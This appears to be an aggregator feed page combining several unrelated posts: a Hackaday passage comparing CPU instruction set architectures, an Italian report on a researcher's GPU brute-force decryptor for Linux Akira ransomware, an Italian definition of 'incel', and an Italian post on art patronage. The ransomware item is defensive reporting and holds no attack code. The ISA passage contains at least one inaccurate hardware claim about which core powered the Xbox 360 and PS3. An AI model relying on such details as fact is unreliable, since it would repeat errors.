CPUs today are almost all what in the olden days would have been called RISC (reduced instruction set computer) architectures, with a relatively small number of heavily optimized instructions. Using approaches like register renaming, CPUs can handle many simultaneous threads of execution, which for the software side that talks to the ISA is completely invisible. For the software, there is just the one register file, and unless something breaks the illusion, like when speculative execution has a bad day, each thread of execution is only aware of its own context and nothing else.

So if CPU microarchitectures have pretty much merged at this point, what difference does the ISA make?

Instruction Set Nitpicking

Within the world of ISA flamewars, the battle lines have currently mostly coalesced around topics like the pros and cons of delay slots, as well as those of compressed instructions, and setting status flags versus checking results in a branch. It is incredibly hard to compare ISAs in an apple-vs-apples fashion, as the underlying microarchitecture of a commercially available ARMv8-based CPU will differ from a similar x86_64- or RV64I- or RV64IMAC-based CPU. Here the highly modular nature of RISC-V adds significant complications as well.

If we look at where RISC-V is being used today in a commercial setting, it is primarily as simple embedded controllers where this modularity is an advantage, and compatibility with the zillion other possible RISC-V extension combinations is of no concern. Here, using RISC-V has an obvious advantage over in-house proprietary ISAs, due to the savings from outsourcing it to an open standard project. This is however also one of the major weaknesses of this ISA, as the lack of a fixed ISA along the pattern of ARMv8 and x86_64 makes tasks like supporting a Linux kernel for it much more complicated than it should be.

This has led Google to pull initial RISC-V support from Android due to the ballooning support complexity. Since every RISC-V-based CPU is only required to support the base integer instruction set, and so many things are left optional, from integer multiplication (M), atomics (A), bit manipulation (B), and beyond, all software targeting RISC-V has to explicitly test that the required instructions and functionality is present, or use a fallback.

Tempers are also running hot when it comes to RISC-V’s lack of integer overflow traps and carry instructions. As for whether compressed instructions are a good idea, the ARMv8 camp does not see any need for them, while the RISC-V camp is happy to defend them, and meanwhile x86_64 still happily uses double the number of instruction lengths courtesy of its CISC legacy, which would make x86_64 twice as bad or twice as good as RISC-V depending on who you ask.

Meanwhile an engineer with strong experience on the ARM side of things wrote a lengthy dissertation a while back on the pros and cons of these three ISAs. Their conclusion is that RISC-V is ‘minimalist to a fault’, with overlapping instructions and no condition codes or flags, instead requiring compare-and-branch instructions. This latter point cascades into a number of compromises, which is one of the major reasons why RISC-V is seen as problematic by many.

In summary, in lieu of clear advantages of RISC-V against fields where other ISAs are already established, its strong points seem to be mostly where its extreme modularity and lack of licensing requirements are seen as convincing arguments, which should not keep anyone from enjoying a good flame war now and then.

The China Angle

The Loongson 3A6000 (LS3A6000) CPU. (Credit: Geekerwan, Wikimedia)
Although everywhere that is not China has pretty much coalesced around the three ISAs already described, there are always exceptions. Unlike Russia’s ill-fated very-large-instruction-word Elbrus architecture, China’s CPU-related efforts have borne significantly more fruit. Starting with the Loongson CPUs, China’s home-grown microprocessor architecture scene began to take on real shape.

Originally these were MIPS-compatible CPUs. But starting with the 3A5000 in 2021, Chinese CPUs began to use the new LoongArch ISA. Described as being a ‘bit like MIPS or RISC-V’ in the Linux kernel documentation on this ISA, it features three variants, ranging from a reduced 32-bit version (LA32R) and standard 32-bit (LA32S) to a 64-bit version (LA64). In the current LS3A6000 CPU there are 16 cores with SMT support. In reviews these chips are shown to be rapidly catching up to modern x86_64 CPUs, including when it comes to overclocking.

Of course, these being China-only hardware, few Western reviewers have subjected the LS3A6000, or its upcoming successor the LS3A7000, to an independent test.

In addition to LoongArch, other Chinese companies are using RISC-V for their own microprocessors, such as SpacemiT, an AI-focused company, whose products also include more generic processors. This includes the K1 octa-core CPU which saw use in the MuseBook laptop. As with all commercial RISC-V-based cores out today, this is no speed monsters, and even the SiFive Premier P550 SoC gets soundly beaten by even a Raspberry Pi 4’s already rather long-in-the-tooth ARM-based SoC.

Perhaps the most successful use of RISC-V in China are the cores in Espressif’s popular ESP32-C range of MCUs, although here too they are the lower-end designs relative to the Xtensa Lx6 and Lx7 cores that power Espressif’s higher-end MCUs.

Considering all this, it wouldn’t be surprising if China’s ISA scene outside of embedded will feature mostly LoongArch, a lot of ARM, some x86_64 and a sprinkling of RISC-V to round it all out.

It’s All About The IP

The distinction between ISAs and microarchitecture can be clearly seen by contrasting Apple Silicon with other ARMv8-based CPUs. Although these all support a version of the same ARMv8 ISA, the magic sauce is in the intellectual property (IP) blocks that are integrated into the chip. These range from memory controllers, PCIe SerDes blocks, and integrated graphics (iGPU), to encryption and security features. Unless you are an Apple or Intel with your own GPU-solution, you will be licensing the iGPU block along with other IP blocks from IP vendors.

These IP blocks offer the benefit of being able to use off-the-shelf functionality with known performance characteristics, but they are also where much of the cost of a microprocessor design ends up going. Developing such functionality from scratch can pay for itself if you reuse the same blocks over and over like Apple or Qualcomm do. For a start-up hardware company this is one of the biggest investments, which is why they tend to license a fully manufacturable design from Arm.

The actual cost of the ISA in terms of licensing is effectively a rounding error, while the benefit of being able to leverage existing software and tooling is the main driver. This is why a new ISA like LoongArch may very well pose a real challenge to established ISAs in the long run, beacause it is being given a chance to develop in a very large market with guaranteed demand.

Spoiled For Choice

Meanwhile, the Power ISA is also freely available for anyone to use without licensing costs; the only major requirement is compliance with the Power ISA. The OpenPOWER Foundation is now also part of the Linux Foundation, with a range of IBM Power cores open sourced. These include the A2O core that’s based on the A2I core which powered the XBox 360 and Playstation 3’s Cell processor, as well as the Microwatt reference design that’s based on the much newer Power ISA 3.0.

Whatever your fancy is, and regardless of whether you’re just tinkering on a hobby or commercial project, it would seem that there is plenty of diversity in the ISA space to go around. Although it’s only human to pick a favorite and favor it, there’s something to be said for each ISA. Whether it’s a better teaching tool, more suitable for highly customized embedded designs, or simply because it runs decades worth of software without fuss, they all have their place.

hackaday.com/2025/03/18/checki…

Il ricercatore Yohanes Nugroho ha rilasciato uno strumento per decifrare i dati danneggiati dalla variante Linux del ransomware Akira. Lo strumento sfrutta la potenza della GPU per ottenere chiavi di decrittazione e sbloccare i file gratuitamente.

L’esperto ha affermato di aver trovato la soluzione dopo che un amico gli ha chiesto aiuto. Ha stimato che il sistema crittografato potrebbe essere violato in circa una settimana (in base al modo in cui Akira genera le chiavi di crittografia utilizzando i timestamp).

Alla fine, il progetto ha richiesto tre settimane per essere completato e il ricercatore ha dovuto spendere circa 1.200 dollari in risorse GPU necessarie per decifrare la chiave di crittografia. Ma alla fine il metodo ha funzionato.

Lo strumento di Nugroho è diverso dai tradizionali decryptor, in cui gli utenti forniscono una chiave per sbloccare i file. Al contrario, utilizza la forza bruta per ottenere chiavi di crittografia (uniche per ogni file), sfruttando il fatto che Akira genera chiavi di crittografia in base all’ora corrente (in nanosecondi) e la utilizza come seed.

Akira genera dinamicamente chiavi di crittografia univoche per ogni file utilizzando quattro diversi timestamp con una precisione al nanosecondo e ne esegue l’hashing utilizzando 1500 cicli di SHA-256.

Queste chiavi vengono crittografate utilizzando RSA-4096 e aggiunte alla fine di ogni file crittografato, rendendone difficile la decifratura senza la chiave privata. Il livello di precisione dei timestamp crea oltre un miliardo di possibili valori al secondo, rendendo difficili gli attacchi brute-force. Inoltre, Nugroho ha scoperto che la versione Linux del malware crittografa più file contemporaneamente utilizzando il multithreading, il che rende ancora più difficile determinare la marca temporale.

Il ricercatore ha ristretto i possibili timestamp dell’attacco brute force esaminando i log condivisi dal suo amico. Ciò ha permesso di rilevare il tempo di esecuzione del ransomware e i metadati del file hanno aiutato a stimare il tempo di completamento della crittografia.

I primi tentativi di hacking furono effettuati sulla RTX 3060 e si rivelarono troppo lenti: il limite era di soli 60 milioni di test al secondo. Nemmeno l’aggiornamento alla RTX 3090 ha aiutato molto.

Alla fine Nugroho si è rivolto ai servizi GPU cloud RunPod e Vast.ai, che hanno fornito potenza sufficiente e hanno contribuito a confermare l’efficacia dello strumento da lui creato. L’esperto ha utilizzato sedici RTX 4090 e ci sono volute circa 10 ore per forzare la chiave. Tuttavia, a seconda del numero di file crittografati da recuperare, questo processo potrebbe richiedere diversi giorni.

Tuttavia, il ricercatore fa notare che gli specialisti delle GPU possono chiaramente ottimizzare il suo codice, quindi le prestazioni possono probabilmente essere migliorate.

Nugroho ha già pubblicato il suo decryptor su GitHub, dove ha anche pubblicato istruzioni dettagliate su come recuperare i file Akira crittografati.

L'articolo Ogni tanto una gioia… anzi mezza! Scoperto un modo per decifrare Akira su server Linux proviene da il blog della sicurezza informatica.

Incel, abbreviazione dell’espressione inglese involuntary celibates (“casti non per scelta”): è utilizzata per definire uomini eterosessuali che non hanno rapporti sessuali perché si sentono discriminati e rifiutati dalle donne, che incolpano di privarli di quello che reputano un loro diritto.

ilpost.it/2025/03/18/incel/.

Dal Rinascimento a oggi, il mecenatismo è stato un ponte tra potere, ricchezza e cultura. Oggi, dal report di Avant Arte, vediamo una trasformazione di questo fenomeno: una nuova generazione di collezionisti e mecenati non si limita più a sostenere economicamente musei e istituzioni, ma partecipa attivamente alla diffusione dell’arte. Questo cambiamento porta con sé una riflessione fondamentale: il mecenatismo contemporaneo deve solo promuovere o anche valorizzare?

Promuovere vs valorizzare: una distinzione cruciale

Spesso si usano questi termini come sinonimi, ma hanno significati profondamente diversi. Promuovere significa amplificare la visibilità di un'opera, un artista o un progetto attraverso strategie di comunicazione, marketing e diffusione. È un primo passo importante, ma da solo non garantisce la crescita culturale. Valorizzare, invece, è un processo più profondo: significa riconoscere e accrescere il valore di un’opera, mettendone in luce il significato, inserendola in un contesto che ne amplifichi la portata culturale e sociale.

Se il mecenatismo moderno vuole davvero lasciare un segno, non può limitarsi alla promozione. Deve creare connessioni, contesti e significati che permettano all’arte di avere un impatto duraturo nella società.

Il futuro del mecenatismo

Il modello che emerge dal report di Avant Arte suggerisce che i nuovi collezionisti vogliono essere più coinvolti nel processo creativo e culturale. Questa è una grande opportunità: il mecenatismo non è più solo un privilegio di pochi, ma può diventare un motore collettivo per sostenere e dare valore all’arte contemporanea.

Forse la vera sfida è questa: riusciremo a costruire un mecenatismo che non sia solo un investimento di mercato, ma un atto politico e culturale capace di generare un impatto reale?

@Arte e Cultura
@Cultura

artribune.com/professioni-e-pr…

#Arte #mecenatismo #collezionismo #cultura #artecontemporanea

Il report di Avant Arte sui nuovi collezionisti e mecenati dell'arte | Artribune

Secondo l'analisi prodotta annualmente dal marketplace l’88% di questi ha sia le risorse che il desiderio di donare di più ai musei e di sostenerli concretamente

^{Cristina Masturzo (Artribune)}